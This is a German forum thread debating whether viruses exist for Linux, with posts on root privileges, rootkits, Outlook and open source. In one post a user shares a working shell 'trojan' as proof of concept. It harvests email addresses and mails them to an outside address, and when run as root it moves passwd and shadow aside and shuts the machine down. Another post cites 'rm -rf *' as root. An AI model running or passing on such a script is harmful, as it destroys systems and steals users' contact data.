Keine Viren unter Linux

Message
Author
chrisjumper
Posts: 104
Joined: 12. Feb 2004 12:53
Location: Jülich

Keine Viren unter Linux

#1 Post by chrisjumper »

Guten Abend!

Also ich war heute auf der Cebit und ein "Suse-Mitarbeiter" hat behauptet man bräuchte unter "Linux" kein Virenprogramm da es unter Linux keine Viren gibt.. oder geben kann. Und das hielte ich ehrlich gesagt.. für sehr sehr.. großen schwachsinn. Ich meine ich kenne mich mit viren doch nicht aus... aber es ist doch durchaus möglich.. das man solche "Programme" auch "für linuxrechner" schreiben kann.

Oder liege ich damit falsch? Trojaner gibts doch bestimmt auch .. unter Linux!

Liebe grüße

chris

Hein

Re: Keine Viren unter Linux

#2 Post by Hein »

Hi
<blockquote><hr>.. für sehr sehr.. großen schwachsinn. Ich meine ich kenne mich mit viren doch nicht aus...<hr></blockquote>
Was bringt dich denn dazu eine SuSE Mitarbeiter schwachsinnig zu nennen? wo du dich doch nach eigenen Aussagen nicht auskennst. Leider muß ich hier auf <i>Suchmaschine</i> verweisen da es massig Infos zu dem Thema gibt mit vielen verschiedenen Aussagen.
Aufgrund des (noch geringen) Verbreitungsgrades von Linux existieren tatsächlich noch ziemlich wenig Viren/Trojaner die "weggepatcht" werden können und auch werden. Das heißt nicht das es unmöglich ist Viren für Linux zu schreiben. Doch die meisten wollen ja einen "zweifelhaften Ruhm" mit ihren Progrämmchen erreichen den sie mit Linux nicht erreichen weil die Anzahl der betroffenen Systeme noch zu klein wäre. Außerdem hat Linux den Vorteil der Transparenz so das nicht jedes System gleich ist im Gegensatz zu anderen Systemen die nicht offen (OS) sind.
Such mal im Netz nach Trojaner - Viren - Linux , da solltest du kompetente Hilfe bekommen, auch wenn für dich vieles "schwachsinnig" zu sein scheint.
MfG

chrisjumper
Posts: 104
Joined: 12. Feb 2004 12:53
Location: Jülich

Re: Keine Viren unter Linux

#3 Post by chrisjumper »

Lieber Hein,

es tut mir leid.. ich habe mich eben ein wenig zu euphorisch ausgedrückt. Ich wollte auch keinen Mittarbeiter als "schwachsinnig" bezeichnen. Aber ich empfand es einfach ein bisschen zu leichtfertig. So etwas einfach so zu behaupten.

Ich benötige auch keine hilfe da ich (noch) kein Problem habe. Suche einfach nur nach Informationen dazu.

Weil ich mich jetzt einfach mal bei euch umhören möchte, um eure Meinung dazu zu hören hab ich auch diesen Beitrag gepostet..

Chris

arno

Re: Keine Viren unter Linux

#4 Post by arno »

hi

wie schon gesagt sind viren unter linux noch nicht so geläufig.
gefählicher sind root-kits die schwachstellen (meist bei servern) ausnutzen.

finde es nicht schlecht auch unter linux einen virenscanner zu haben damit man eben keine
viren ungewollt weiterverbreitet auch wenn sie selber einem nicht schaden.
da kann ich f-prot und clamav empfehlen und fürs mail den
Mailscanner

mfg
arno

zero

Re: Keine Viren unter Linux

#5 Post by zero »

100% sicher gibt es nie!!!

Sehr sicher würde der Rechner nur werden, wenn Du mit ihm nicht
ins Internet gehen und auch keine Mails abholen würdest.
Weiterhin dürftest Du dann nie wieder eine Diskette, CD oder ein anderes
Wechselmedium einlegen. --> Dann wäre der Rechner sicher.

Es wird immer Wege und Viren geben, die einem Betriebssystem Schaden
zufügen. Die frage ist nur ob sich der Aufwand lohnt (Verbreitung des Betriebssystem).
Aber das sagten auch schon meine Vorredner.

MfG

Allo

Re: Keine Viren unter Linux

#6 Post by Allo »

<blockquote><pre><font size="1" face="">code:</font><hr><font face="Courier New" size="2">
#!/bin/sh
# LAST EDIT: Mon Nov 25 00:27:09 2002 by Hauke Zuehl(hzuehl@athene.dnsalias.org)

#
# This is a little OpenSource trojan horse
#
# It is written for fun and of course this very "secret" code is GPLed
#
# Written by Bill "I am Borg" Gates <bill.gates@microsoft.com>

MAILERDIRS=".Mail .mozilla evolution .kde .kde2 .kde3"

#
# Check who I am
WHOAMI=`whoami`
MY_UID=`grep $WHOAMI /etc/passwd | cut -d: -f 3`

#
# Get good network interfaces
ETH0=`/sbin/ifconfig eth0 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`
ETH1=`/sbin/ifconfig eth1 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`
PPP0=`/sbin/ifconfig ppp0 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`

if [ -z $ETH0 ] ; then
if [ -z $ETH1 ] ; then
if [ -z $PPP0 ] ; then
exit 1
else
MAILIFACE=$PPP0
fi
else
MAILIFACE=$ETH1
fi
else
MAILIFACE=$ETH0
fi

# We need a "secret" directory for all our stuff
SECRETDIR="/tmp/...123"
rm -rf $SECRETDIR
mkdir $SECRETDIR 2>/dev/null

if [ $MY_UID -eq 0 ] ; then
# We are root??? Great!!
mv /etc/passwd /etc/passwd.virus
mv /etc/shadow /etc/shadow.virus
/sbin/init 0
else
cd $HOME
# Okay, we are only a lousy (l)user, but let's try to find mail addresses
rm -f $SECRETDIRS/mails $SECRETDIR/mails.ats 2>/dev/null
for i in $MAILERDIRS ; do
if [ -x ~/$i ] ; then
find ~/$i -type f -exec grep "<.*@.*>" {} ;<!--no--> | \
cut -d\< -f 2 | cut -d\> -f 1 >> $SECRETDIR/mails
fi
done
grep "^.*@[a-z]*\..*$" $SECRETDIR/mails > $SECRETDIR/mails.ats
sort -d -o $SECRETDIR/mails.sorted $SECRETDIR/mails.ats
rm $SECRETDIR/mails $SECRETDIR/mails.ats
uniq $SECRETDIR/mails.sorted $SECRETDIR/mails
rm $SECRETDIR/mails.sorted
fi

# Is sendmail running?
ps ax | grep sendmail | grep -v grep >/dev/null

if [ $? -eq 0 ] ; then
# Great :)
echo "From: `whoami`@$MAILIFACE" > $SECRETDIR/header.txt
echo "To: MacGyver@athene.dnsalias.org" >> $SECRETDIR/header.txt
echo " " >> $SECRETDIR/header.txt
cat $SECRETDIR/header.txt $SECRETDIR/mails | \
mail -s "`whoami`" MacGyver@athene.dnsalias.org
fi

rm -rf $SECRETDIR

exit 0
</font><hr></pre></blockquote>

Ist das Beweis genug? <img src="http://www.pl-forum.de/UltraBoard/Images/Wilk.gif" border="0" align="middle">

Aber es gibt tatsächlich (noch) fast keine, und potienziellen Viren wird das Leben schwer gamacht, weil man normalerweise nicht root ist.


Allo

Scory

Re: Keine Viren unter Linux

#7 Post by Scory »

>Ist das Beweis genug?

Ja - aber eben genau für das Gegenteil: es gibt keine Viren für Linux Clients. Warum: steht im doch im Plaintext da:

1) Das Script muss händisch ausgeführt werden, weil es unter Linux kein Outlook o.ä. gibt welches Shell-Scripts "automatisch" ohne Nachfrage ausführt - egal ob beim Öffnen einer Email oder beim Entpacken eines ZIPs oder sonstwie. Oder wie stellst Du Dir vor, wie das tolle Script ausgeführt werden soll?

2) Zusätzlich muss derjenige, der das Script ausführt, sich auch noch als "root" einloggen, weil es sonst nicht funkioniert.

Frage: WER IST DENN SO BLÖD? Dann kann man auch sagen "rm -rf *" ist ein saugefährlicher Virus - weil wenn man das als root im /-Verzeichnis ausführt, ist Linux platt.

Bussen

Re: Keine Viren unter Linux

#8 Post by Bussen »

Frage: WER IST DENN SO BLÖD? Dann kann man auch sagen "rm -rf *" ist ein saugefährlicher Virus - weil wenn man das als root im /-Verzeichnis ausführt, ist Linux platt.

Antwort:
Wann hast du dir denn das letzte mal den kompletten Quellcode durchgelesen?????
Also fast jeder.
Oder:
Noch schlimmer: RPM´s sind bereits kompiliert. Keine kontrolle möglich. Also muss man immer den Quellcode durchlesen und danach erst selber kompilieren???

Descartes

Re: Keine Viren unter Linux

#9 Post by Descartes »

@Allo
Dein Script hat aber mehrere (Design- wie auch Technische-) Probleme:
<li> MY_UID kannst du viel einfacher mit "id -u" ermitteln
<li> Was passiert, wenn ich statt per Modem eine ISDN Leitung verwende?
<li> Wenn die Root-Partition ("/") read-only gemountet ist wäre für das Script auch ungünstig
<li> Der Dateiname für ${SECRETDIR} ist hard-coded und nicht Multi-User tauglich => potenzielles Problem einer Race-Condition
<li> Auf den meisten Rechnern von Privat-Personen wird ein MTA (wenn überhaupt) nur temporär zum Mailversenden gestartet aber läuft nicht 24/7 auf der Maschine. Damit das Script allerdings erfolgreich läuft <li> MUSS* unbedingt zur Zeit der Scriptausführung ein MTA gestartet sein.

Scory

Re: Keine Viren unter Linux

#10 Post by Scory »

>Wann hast du dir denn das letzte mal den kompletten Quellcode durchgelesen?????

Welchen Quellcode?

Du willst doch jetzt nicht wirklich unterstellen, in Quellcode von OpenSource Projekten müsse man mit solchen "Viren" rechnen? Ist es das, was Du sagen möchtest? Wie glaubst Du eigentlich "entsteht" Quellcode?

User avatar
max
Posts: 806
Joined: 14. May 2000 12:55
Location: Ruhrpott

Re: Keine Viren unter Linux

#11 Post by max »

IMHO kann man die Würmer/Viren/Trojaner in 2.Klassen unterteilen:
1) Das $BÖSEDING startet sich selbst in dem es eine aktuelle Lücke vom Wirts-OS nutzt. Siehe NETSKY.P
2) Das $BÖSEDING nutzt eine Schwachstelle in Brain V1 aus. Allg. Blödheit genannt. Leider ein verbreitetes Phänomen namens DAU. (Siehe Bagle.I)

Wie du, OP, siehst nenne ich kein OS, weil das egal ist.
Entweder man hat einen guten Support von seinem Lieblings OS, oder nutzt ausnahmsweise mal Brain, bzw. datet up auf BRAIN V1.2


Gruß Max

chlor

Re: Keine Viren unter Linux

#12 Post by chlor »

ich war heute ebenfalls auf der cebit, und ich vermute, das ich wohl dem gleichen menschen lauschen durfte wie ChrisJumper. nun, der typ den ich mir angehört habe, trug echt sehr dick auf, einfach etwas überzogen. ein kleines stück weiter weg von der bühne saßen suse mitarbeiter, die kompetent und ruhig fragen beantwortet haben, die waren wirklich wesentlich angenehmer und konnten ihre sachen gut vermitteln.
der mann am mikro hatte einen ganz-einfach beschissenen job den sicher erstmal wer besser machen muß - der balance act, weder gegen microsoft zu wettern und dabei doch eine klare stellung zu beziehen, die wirklich allen gefällt. da stehen/standen vom schüler bis mindestens zum mittelstands-unternehmer alle gruppen von messe-besuchern/innen, und auf mich hat der typ, es tut mir leid, gewirkt wie einer der autowaschmittel vor großen supermärkten oder in innenstädten unter die leute bringen muß, das war halt ein sau beschissener job.
vielleicht passt sowas auch einfach nicht zu einem seriösen (ich nehme das jetzt mal an) unternehmen wie suse.
jedenfalls kann ich ChrisJumper jetzt ein wenig besser verstehen.

lopossum

Re: Keine Viren unter Linux

#13 Post by lopossum »

Ist es nicht so, dass ein Virus auf fehlerhaften binaries/scripts aufsetzt, die es ermoeglichen
Benutzerrechte zu umgehen, bzw. Speicherbereiche zu ueberschreiben? Haengt das, bspw. im Fall
der Scripts, nicht von der Implemetation der Scriptingengine (bspw. Perl) ab? Was kann Linux
denn gegen ein "boeses" Perl tun?

mee

Re: Keine Viren unter Linux

#14 Post by mee »

Generell würde ich sagen, dass es möglich ist. Durch das Design von Linux sollte dem jedoch um einiges Schwerer sein als bei diesem OS aus Redmond. Die Grössere Gefahr sind, wie bereits gesagt, eher Rootkits. Doch eins kann man mit 100% Genauigkeit sagen, jedes Linux-System ist anders! Jedes hat andere Programme und Librarys installiert. Bei Windoof ist das Grundsystem wahrscheinlich immer gleich und hat von 95 bis XP sicher auch einige Ähnlichkeit. Ein wunder Punkt an dem ein Virus ansetzen kann.

@Scory
Und das es sowas wie Outlook nicht für Linux gibt kann auch nur eine Sache der Zeit sein. Stell dir vor M$ entdeckt Linux ganz neu und bringt Outlook für Linux raus. Was dann?

@Descartes
Ich würde sagen, dass das Skript sowas wie ein "Proof of concept" ist. Und ausserdem ist dem ja GPL'ed, mach es besser ;)

only my sänf ;)

Scory

Re: Keine Viren unter Linux

#15 Post by Scory »

>Stell dir vor M$ entdeckt Linux ganz neu und bringt Outlook für Linux raus. Was dann?

Dann gibt es kein Windows mehr - *lach*!

Mal im Ernst: "Outlook" ist nicht deswegen schlecht weil es Outlook heißt, sondern weil die Implementierung (via ActiveX etc.) ganz dicht am Betriebssystemkern erfolgt. Dazu kommt das Urproblem von Windows, daß jeder Anwender stets mit Admin-Rechten unterwegs ist: selbst bei WindowsXP, wo M$ ja wirklich mal die Chance gehabt hätte, einen "echten" User einrichten zu lassen (während der Installation), wird wieder mal nichts anderes eingerichtet als ein zweiter Admin mit anderem Namen. Saudoof!

Wer Linux installiert kommt gar nicht erst auf die Idee, bei der Einrichtung seines Accounts Root-Rechte zu vergeben - dazu reichen bei Anfängern die Kenntnisse nicht aus und Profis machen es erst recht nicht. Und eben die Kombination aus diesen beiden Dingen (betriebssystemnahe Implementierung plus Adminrechte) machen Outlook so angreifbar (und ebenso Internet Explorer). Selbst wenn also M$ einen Outlook für Linux entwickelten - diese beiden Punkte könnten sie nur schwerlich umsetzen. Außerdem würden sie an einem dritten Punkt scheitern: "freie Software" von M$??

Ich bleibe dabei: wirklich gefährliche Viren für Linux sind wahrscheinlich nicht zu realisieren, und selbst wenn es wirklich mal einem gelänge, dann kommt noch ein dritter Punkt zum tragen, der Vorteil des OpenSource-Gedanken: einen Fix für das Sicherheitsloch wird es um Welten schneller geben als von M$ - weil jedermann den Source einsehen kann und die Schwachstelle viel schneller behoben werden kann. Man bedenke, daß M$ für das letzte Sicherheitsupdate (die Geschichte von eEye mit dem "Loch" in den Sicherheitszertifikaten bei vermeintlich "sicherem" Zugriff via https) geschlagene 8 Monate gebraucht hat - das wäre unter Linux unvorstellbar.

Alles in allem sind das natürlich Dinge, die Hersteller von AntiViren-Software nicht gerne lesen: je mehr Linux es gibt, umso weniger Absatz droht - ganz einfach formuliert. Deswegen drücken die auch gerne mal auf die Tube und erzählen eben solchen Käse wie hier vorgegeben.

Grüße
Scory

Post Reply